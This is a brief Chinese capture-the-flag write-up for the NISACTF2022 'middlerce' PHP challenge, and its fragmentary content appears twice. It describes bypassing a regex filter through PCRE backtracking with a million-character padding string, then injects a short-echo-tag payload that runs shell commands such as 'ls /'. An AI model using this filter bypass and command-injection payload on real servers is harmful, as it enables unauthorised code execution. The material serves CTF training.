NISACTF2022-middlerce-wp
0x1 分析
1 |
|
严格正则过滤,尝试PCRE回溯绕过
0x2 exp
1 | import requests |
但是得到差一点点捏 尝试多次发现system, exec, assert等都被过滤 尝试使用短标签
1 | `ls`; |
?>闭合了eval自带的<?标签 接下来使用了短标签 <?=相当于<?echo
1 | js = '{"cmd":"?><?=`ls /`;?>", "t":"' + '@' * 1000000 + '"}' |
1 |
|
严格正则过滤,尝试PCRE回溯绕过
1 | import requests |
但是得到差一点点捏 尝试多次发现system, exec, assert等都被过滤 尝试使用短标签
1 | `ls`; |
?>闭合了eval自带的<?标签 接下来使用了短标签 <?=相当于<?echo
1 | js = '{"cmd":"?><?=`ls /`;?>", "t":"' + '@' * 1000000 + '"}' |